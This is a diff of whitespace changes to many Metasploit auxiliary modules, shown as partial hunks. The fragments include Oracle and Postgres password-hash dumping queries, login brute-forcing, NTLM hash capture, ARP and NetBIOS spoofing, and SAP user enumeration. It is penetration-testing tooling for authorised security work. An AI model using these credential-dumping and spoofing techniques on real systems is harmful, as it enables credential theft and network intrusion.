res = send_request_cgi({
'version' => '1.1',
@ -193,7 +193,7 @@ class Metasploit3 < Msf::Auxiliary
print_status("Unexpected Response of: #{res.code}")#''
return :abort
end
rescue ::Rex::ConnectionError => e
vprint_error("#{msg} - #{e}")
return :abort


@ -60,7 +60,7 @@ class Metasploit3 < Msf::Auxiliary
def hostport
[target_host,rport].join(":")
end
def uri
datastore['URI'] || "/isqlplus/"
end
@ -89,7 +89,7 @@ class Metasploit3 < Msf::Auxiliary
print_error "#{msg} Cannot connect"
rescue ::Timeout::Error, ::Errno::EPIPE,Errno::ECONNRESET => e
print_error e.message
end
end
end
def get_oracle_version(ip)


@ -16,8 +16,8 @@ class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::ORACLE
include Msf::Auxiliary::Report
include Msf::Auxiliary::Scanner
def initialize
super(
'Name' => 'Oracle Password Hashdump',
@ -25,7 +25,7 @@ class Metasploit3 < Msf::Auxiliary
'Description' => %Q{
This module dumps the usernames and password hashes
from Oracle given the proper Credentials and SID.
These are then stored as loot for later cracking.
These are then stored as loot for later cracking.
},
'Author' => ['TheLightCosine <thelightcosine[at]gmail.com>'],
'License' => MSF_LICENSE
@ -34,23 +34,23 @@ class Metasploit3 < Msf::Auxiliary
def run_host(ip)
return if not check_dependencies
#Checks for Version of Oracle, 8g-10g all behave one way, while 11g behaves differently
#Also, 11g uses SHA-1 while 8g-10g use DES
is_11g=false
query = 'select * from v$version'
ver = prepare_exec(query)
if ver.nil?
print_error("An Error has occured, check your OPTIONS")
return
end
unless ver.empty?
if ver[0].include?('11g')
is_11g=true
print_status("Server is running 11g, using newer methods...")
end
end
end
this_service = report_service(
@ -59,14 +59,14 @@ class Metasploit3 < Msf::Auxiliary
:name => 'oracle',
:proto => 'tcp'
)
tbl = Rex::Ui::Text::Table.new(
'Header' => 'Oracle Server Hashes',
'Ident' => 1,
'Columns' => ['Username', 'Hash']
)
)
#Get the usernames and hashes for 8g-10g
begin
@ -79,7 +79,7 @@ class Metasploit3 < Msf::Auxiliary
tbl << row
end
end
#Get the usernames and hashes for 11g
#Get the usernames and hashes for 11g
else
query='SELECT name, spare4 FROM sys.user$ where password is not null and name<> \'ANONYMOUS\''
results= prepare_exec(query)
@ -91,7 +91,7 @@ class Metasploit3 < Msf::Auxiliary
tbl << row
end
end
end
rescue => e
print_error("An error occured. The supplied credentials may not have proper privs")
@ -99,14 +99,14 @@ class Metasploit3 < Msf::Auxiliary
end
print_status("Hash table :\n #{tbl}")
report_hashes(tbl.to_csv, is_11g, ip, this_service)
schema= get_schema()
unless schema.nil? or schema.empty?
report_other_data(schema,ip)
end
end
def get_schema
#Grabs the Database and table names for storage
#These names will be sued later to seed wordlists for cracking
@ -121,7 +121,7 @@ class Metasploit3 < Msf::Auxiliary
schema[db]= tables
end
end
end
return schema
end


@ -36,7 +36,7 @@ class Metasploit3 < Msf::Auxiliary
[
[ 'URL', 'http://www.oracle.com/us/products/database/index.html' ],
[ 'CVE', '1999-0502'], # Weak password CVE
[ 'URL', 'http://nmap.org/nsedoc/scripts/oracle-brute.html']
[ 'URL', 'http://nmap.org/nsedoc/scripts/oracle-brute.html']
],
'Version' => '$Revision$'
))
@ -78,7 +78,7 @@ class Metasploit3 < Msf::Auxiliary
def sid
datastore['SID'].to_s
end
def nmap_build_args(credpath)
nmap_reset_args
nmap_append_arg "-P0"


@ -92,7 +92,7 @@ class Metasploit3 < Msf::Auxiliary
print_error("POP3 server does not appear to be running")
return :abort
end
vprint_status("#{target} - Trying user:'#{user}' with password:'#{pass}'")
cmd = "USER #{user}\r\n"
pop3_send(cmd,!@connected)


@ -25,7 +25,7 @@ class Metasploit3 < Msf::Auxiliary
'Version' => '$Revision$',
'Description' => %Q{
This module extracts the usernames and encrypted password
hashes from a Postgres server and stores them for later cracking.
hashes from a Postgres server and stores them for later cracking.
},
'Author' => ['TheLightCosine <thelightcosine[at]gmail.com>'],
'License' => MSF_LICENSE
@ -34,14 +34,14 @@ class Metasploit3 < Msf::Auxiliary
OptString.new('DATABASE', [ true, 'The database to authenticate against', 'postgres']),
])
deregister_options('SQL', 'RETURN_ROWSET', 'VERBOSE')
end
def run_host(ip)
#Query the Postgres Shadow table for username and password hashes and report them
res = postgres_query('SELECT usename, passwd FROM pg_shadow',false)
#Error handling routine here, borrowed heavily from todb
case res.keys[0]
when :conn_error
@ -59,21 +59,21 @@ class Metasploit3 < Msf::Auxiliary
when :complete
print_status("Query appears to have run successfully")
end
this_service = report_service(
:host => datastore['RHOST'],
:port => datastore['RPORT'],
:name => 'postgres',
:proto => 'tcp'
)
tbl = Rex::Ui::Text::Table.new(
'Header' => 'Postgres Server Hashes',
'Ident' => 1,
'Columns' => ['Username', 'Hash']
)
res[:complete].rows.each do |row|
next if row[0].nil? or row[1].nil?
@ -93,11 +93,11 @@ class Metasploit3 < Msf::Auxiliary
filename= "#{datastore['RHOST']}-#{datastore['RPORT']}_postgreshashes.txt"
path = store_loot("postgres.hashes", "text/plain", datastore['RHOST'], hashtable, filename, "Postgres Hashes",service)
print_status("Hash Table has been saved: #{path}")
end
end


@ -63,7 +63,7 @@ class Metasploit4 < Msf::Auxiliary
verbose = datastore['VERBOSE']
print_status("#{rhost}:#{rport} [SAP] Connecting to SAP Management Console SOAP Interface")
success = false
soapenv = 'http://schemas.xmlsoap.org/soap/envelope/'
xsi = 'http://www.w3.org/2001/XMLSchema-instance'
xs = 'http://www.w3.org/2001/XMLSchema'


@ -138,10 +138,10 @@ class Metasploit4 < Msf::Auxiliary
:data => {:proto => "soap", :users => users},
:update => :unique_data
)
users.each do |output|
print_good("#{rhost}:#{rport} [SAP] Extracted User: #{output[0]}")
end
end
return
elsif fault
print_error("#{rhost}:#{rport} [SAP] Error code: #{faultcode}")


@ -136,11 +136,11 @@ class Metasploit4 < Msf::Auxiliary
:data => {:proto => "soap", :env => env},
:update => :unique_data
)
env.each do |output|
print_status("#{output[0]}")
end
elsif fault
print_error("#{rhost}:#{rport} [SAP] Error code: #{faultcode}")
return


@ -97,7 +97,7 @@ class Metasploit4 < Msf::Auxiliary
data << '<' + ns1 + ' xmlns:ns1="urn:SAPControl"><filename>' + "#{datastore['RFILE']}" + '</filename></' + ns1 + '>' + "\r\n"
data << '</SOAP-ENV:Body>' + "\r\n"
data << '</SOAP-ENV:Envelope>' + "\r\n\r\n"
begin
res = send_request_raw({
'uri' => "/#{datastore['URI']}",


@ -161,7 +161,7 @@ class Metasploit4 < Msf::Auxiliary
saptbl << [ output[0], output[1], output[2] ]
end
print(saptbl.to_s)
print(saptbl.to_s)
return
elsif fault


@ -149,7 +149,7 @@ class Metasploit4 < Msf::Auxiliary
print_status("#{output[0]}")
end
elsif fault
print_error("#{rhost}:#{rport} [SAP] Error code: #{faultcode}")
return


@ -49,11 +49,11 @@ class Metasploit3 < Msf::Auxiliary
'SPECIAL',
'TEMPORARY'
]
if val > (stypes.length - 1)
return 'UNKNOWN'
end
stypes[val]
end


@ -76,7 +76,7 @@ class Metasploit3 < Msf::Auxiliary
result = try_user_pass(user.downcase, pass)
if result == :next_user
print_status("Username is case insensitive")
user = user.downcase
user = user.downcase
end
end
report_creds(user,pass)
@ -231,7 +231,7 @@ class Metasploit3 < Msf::Auxiliary
end
def report_creds(user,pass)
report_hash = {
:host => rhost,
:port => datastore['RPORT'],


@ -170,7 +170,7 @@ class Metasploit3 < Msf::Auxiliary
if (@coderesult == '501') && @domain.split(".").count > 2
print_error "#{target} - MX domain failure for #{@domain}, trying #{@domain.split(/\./).slice(-2,2).join(".")}"
cmd = 'MAIL FROM:' + " root@" + @domain.split(/\./).slice(-2,2).join(".") + "\r\n"
smtp_send(cmd,!@connected)
smtp_send(cmd,!@connected)
if (@coderesult == '501')
print_error "#{target} - MX domain failure for #{@domain.split(/\./).slice(-2,2).join(".")}"
return :abort
@ -178,7 +178,7 @@ class Metasploit3 < Msf::Auxiliary
elsif (@coderesult == '501')
print_error "#{target} - MX domain failure for #{@domain}"
return :abort
end
end
end
def do_rcpt_enum(user)


@ -45,20 +45,20 @@ class Metasploit3 < Msf::Auxiliary
# Start the TFTP Server
#
def setup
@path = datastore['SOURCE']
@filename = @path.split(/[\/\\]/)[-1] #/
# Setup is called only once
print_status("Starting TFTP server...")
@tftp = Rex::Proto::TFTP::Server.new(69, '0.0.0.0', { 'Msf' => framework, 'MsfExploit' => self })
# Register our file name and data
::File.open(@path, "rb") do |fd|
buff = fd.read(fd.stat.size)
@tftp.register_file(@filename, buff)
end
@tftp.start
add_socket(@tftp.sock)


@ -54,7 +54,7 @@ class Metasploit3 < Msf::Auxiliary
:type => 'snmp.users',
:data => @users
)
rescue ::SNMP::UnsupportedVersion
rescue ::SNMP::RequestTimeout


@ -94,7 +94,7 @@ class Metasploit3 < Msf::Auxiliary
parse_reply(r)
end
end
idx += 1
end
@ -245,10 +245,10 @@ class Metasploit3 < Msf::Auxiliary
if(pkt[1] =~ /^::ffff:/)
pkt[1] = pkt[1].sub(/^::ffff:/, '')
end
asn = OpenSSL::ASN1.decode(pkt[0]) rescue nil
return if not asn
snmp_error = asn.value[0].value rescue nil
snmp_comm = asn.value[1].value rescue nil
snmp_data = asn.value[2].value[3].value[0] rescue nil
@ -260,7 +260,7 @@ class Metasploit3 < Msf::Auxiliary
inf = snmp_info
com = snmp_comm
if(com)
@found[pkt[1]]||={}
if(not @found[pkt[1]][com])


@ -45,7 +45,7 @@ class Metasploit3 < Msf::Auxiliary
end
}
print_good("#{ip} Found Users: #{@users.uniq.sort.join(", ")} ")
@users.each do |user|
report_note(
:host => rhost,
@ -70,4 +70,4 @@ class Metasploit3 < Msf::Auxiliary
print_error("#{ip} Error: #{e.class} #{e} #{e.backtrace}")
end
end
end
end


@ -110,7 +110,7 @@ class Metasploit3 < Msf::Auxiliary
}
info = "#{proto_from_fullname} #{user}:#{pass} (#{ip}:#{port})"
s = start_session(self, info, merge_me, false, conn.lsock)
# Set the session platform
case proof
when /Linux/


@ -85,7 +85,7 @@ class Metasploit3 < Msf::Auxiliary
server_thread = framework.threads.spawn("Module(#{self.refname})-Listener", false) { upnp_client_listener }
# TODO: Test to see if this scheme will work when pivoted.
# Create an unbound UDP socket if no CHOST is specified, otherwise
# create a UDP socket bound to CHOST (in order to avail of pivoting)
udp_send_sock = Rex::Socket::Udp.create(
@ -153,7 +153,7 @@ class Metasploit3 < Msf::Auxiliary
usn_string = $1
info << usn_string.to_s.strip
end
report_service(
:host => addr,
:port => port,


@ -35,11 +35,11 @@ class Metasploit3 < Msf::Auxiliary
def run
targets = crack_phone_ranges(datastore['TARGETS'].split(","))
connect
::FileUtils.mkdir_p( datastore['OUTPUT_PATH'] )
targets.each do |number|
c = create_call
begin
::Timeout.timeout( datastore['CALL_TIME'] ) do
@ -60,9 +60,9 @@ class Metasploit3 < Msf::Auxiliary
ensure
c.hangup rescue nil
end
print_status(" COMPLETED Number: #{number} State: #{c.state} Frames: #{c.audio_buff.length} DTMF: '#{c.dtmf}'")
if c.audio_buff.length > 0
opath = ::File.join( datastore['OUTPUT_PATH'], "#{number}.raw" )
cnt = 0
@ -77,5 +77,5 @@ class Metasploit3 < Msf::Auxiliary
# Next call
end
end
end


@ -35,7 +35,7 @@ class Metasploit3 < Msf::Auxiliary
prints the names of all exploit modules that would be used by
the WebServer action given the current MATCH and EXCLUDE
options.
Also adds a 'list' command which is the same as running with
ACTION=list.
},


@ -208,7 +208,7 @@ class Metasploit3 < Msf::Auxiliary
user = arg[:user]
host = arg[:host]
ip = arg[:ip]
unless @previous_lm_hash == lm_hash and @previous_ntlm_hash == nt_hash then
@previous_lm_hash = lm_hash
@ -268,7 +268,7 @@ class Metasploit3 < Msf::Auxiliary
# Display messages
domain = Rex::Text::to_ascii(domain)
user = Rex::Text::to_ascii(user)
user = Rex::Text::to_ascii(user)
capturedtime = Time.now.to_s
case ntlm_ver


@ -488,7 +488,7 @@ class Metasploit3 < Msf::Auxiliary
lm_chall_message = lm_cli_challenge
end
# Display messages
if esn
smb[:username] = Rex::Text::to_ascii(smb[:username])

View File

@ -113,7 +113,7 @@ class Metasploit3 < Msf::Auxiliary
pwd = ::File.join(datastore['FTPROOT'], @state[c][:cwd])
buf = ''
begin
Dir.new(pwd).entries.each do |ent|
path = ::File.join(datastore['FTPROOT'], ent)
@ -156,7 +156,7 @@ class Metasploit3 < Msf::Auxiliary
c.put "500 Access denied\r\n"
return
end
upath = ::File.expand_path(datastore['FTPROOT'])
npath = ::File.expand_path(::File.join(datastore['FTPROOT'], @state[c][:cwd], arg))
bpath = npath[upath.length, npath.length - upath.length]

View File

@ -31,7 +31,7 @@ class Metasploit3 < Msf::Auxiliary
partition seen. The windows user will have the password p@SSw0rd!123456
(in case of complexity requirements) and will be added to the administrators
group.
Note: the displayed IP address of a target is the address this DHCP server
handed out, not the "normal" IP address the host uses.
},


@ -98,7 +98,7 @@ class Metasploit3 < Msf::Auxiliary
else
shosts_range.each{|shost| if is_ipv4? shost then @shosts.push shost end}
end
if datastore['BROADCAST']
broadcast_spoof
else
@ -116,7 +116,7 @@ class Metasploit3 < Msf::Auxiliary
if capture and @spoofing and not datastore['BROADCAST']
print_status("RE-ARPing the victims...")
3.times do
3.times do
@dsthosts_cache.keys.sort.each do |dhost|
dmac = @dsthosts_cache[dhost]
if datastore['BIDIRECTIONAL']
@ -197,7 +197,7 @@ class Metasploit3 < Msf::Auxiliary
@dsthosts_cache[reply.arp_saddr_ip] = reply.arp_saddr_mac
end
end
end
#Wait some few seconds for last packets
etime = Time.now.to_f + datastore['TIMEOUT']
@ -221,7 +221,7 @@ class Metasploit3 < Msf::Auxiliary
if @dsthosts_cache.has_key? shost
if datastore['VERBOSE']
print_status("Adding #{shost} from destination cache")
end
end
@srchosts_cache[shost] = @dsthosts_cache[shost]
next
end
@ -269,7 +269,7 @@ class Metasploit3 < Msf::Auxiliary
@spoofing = true
while(true)
if datastore['AUTO_ADD']
@mutex_cache.lock
@mutex_cache.lock
if @dsthosts_autoadd_cache.length > 0
@dsthosts_cache.merge!(@dsthosts_autoadd_cache)
@dsthosts_autoadd_cache = {}
@ -366,7 +366,7 @@ class Metasploit3 < Msf::Auxiliary
return unless pkt.arp_opcode == 2
pkt
end
def start_listener(dsthosts_cache, srchosts_cache)
if datastore['BIDIRECTIONAL']
@ -386,8 +386,8 @@ class Metasploit3 < Msf::Auxiliary
else
args[:shosts].each {|address| liste_src_ips.push address}
end
liste_dst_ips = []
args[:dhosts].each_key {|address| liste_dst_ips.push address}
liste_dst_ips = []
args[:dhosts].each_key {|address| liste_dst_ips.push address}
localip = args[:localip]
listener_capture = ::Pcap.open_live(@interface, 68, true, 0)
@ -419,7 +419,7 @@ class Metasploit3 < Msf::Auxiliary
@srchosts_autoadd_cache[pkt.arp_saddr_ip] = pkt.arp_saddr_mac
liste_src_ips.push pkt.arp_saddr_ip
@mutex_cache.unlock
end
end
end
end
end


@ -37,7 +37,7 @@ class Metasploit3 < Msf::Auxiliary
], self.class)
deregister_options('RHOST', 'PCAPFILE')
end
def build_dtp_frame
p = PacketFu::EthPacket.new
p.eth_daddr = '01:00:0c:cc:cc:cc'
@ -52,7 +52,7 @@ class Metasploit3 < Msf::Auxiliary
p.payload = llc_hdr << dtp_hdr
p
end
def is_mac?(mac)
!!(mac =~ /^([a-fA-F0-9]{2}:){5}[a-fA-F0-9]{2}$/)
end
@ -63,7 +63,7 @@ class Metasploit3 < Msf::Auxiliary
return @spoof_mac
end
def run
def run
unless smac()
print_error 'Source MAC (SMAC) should be defined'
else


@ -24,7 +24,7 @@ class Metasploit3 < Msf::Auxiliary
machine to an IP of the attacker's choosing. Combined with auxiliary/capture/server/smb or
capture/server/http_ntlm it is a highly effective means of collecting crackable hashes on
common networks.
This module must be run as root and will bind to tcp/137 on all interfaces.
},
'Author' => [ 'Tim Medin <tim@securitywhole.com>' ],


@ -36,7 +36,7 @@ class Metasploit3 < Msf::Auxiliary
deregister_options('SNAPLEN','FILTER','PCAPFILE','RHOST','TIMEOUT','UDP_SECRET','GATEWAY','NETMASK')
end
def run
check_pcaprub_loaded # Check first
pkt_delay = datastore['PKT_DELAY']


@ -60,7 +60,7 @@ COMMIT;
RETURN NULL;
END;
"
#PROCEDURE CREATE_CHANGE_SET
# Argument Name Type In/Out Default?
# ------------------------------ ----------------------- ------ --------


@ -35,7 +35,7 @@ class Metasploit3 < Msf::Auxiliary
def run
@res = Net::DNS::Resolver.new()
domain = [
"lalundelau.sinip.es","bf2back.sinip.es","thejacksonfive.mobi",
"thejacksonfive.us","thejacksonfive.biz","butterfly.BigMoney.biz",
@ -49,15 +49,15 @@ class Metasploit3 < Msf::Auxiliary
"tamiflux.net","binaryfeed.in","youare.sexidude.com",
"mierda.notengodominio.com",
]
if datastore['DNS_SERVER']
@res.nameservers = datastore['DNS_SERVER']
end
count = 0
while count < datastore['COUNT']
domain.each do |name|
query = @res.query(name, "A")
time = Time.new


@ -38,11 +38,11 @@ class Metasploit3 < Msf::Auxiliary
if datastore['DNS_SERVER']
@res.nameservers = datastore['DNS_SERVER']
end
count = 0
while count < datastore['COUNT']
domain = datastore['DOMAINS'].split(/[\s,]+/)
domain.each do |name|
query = @res.query(name, "A")


@ -35,7 +35,7 @@ class Metasploit3 < Msf::Auxiliary
def run
@res = Net::DNS::Resolver.new()
domain = [
"allspring.net","antifoher.biz","asdfasdgqghgsw.cx.cc",
"ashnmjjpoljfnl.info","atlaz.net","b3l.org","back.boroborogold.ru",
@ -54,15 +54,15 @@ class Metasploit3 < Msf::Auxiliary
"favoritopilodjd.com","favqnornkwvkwfxv.biz","fdhjkfhskas.com",
"federalreserve-report.com","federetoktyt.net"
]
if datastore['DNS_SERVER']
@res.nameservers = datastore['DNS_SERVER']
end
count = 0
while count < datastore['COUNT']
domain.each do |name|
query = @res.query(name, "A")
time = Time.new


@ -12,13 +12,13 @@
require 'msf/core'
class Metasploit3 < Msf::Auxiliary
#
# This module acts as an compromised webserver distributing PII Data
#
include Msf::Exploit::Remote::HttpServer::HTML
include Msf::Auxiliary::PII
def initialize(info = {})
super(update_info(info,
'Name' => 'VSploit Web PII',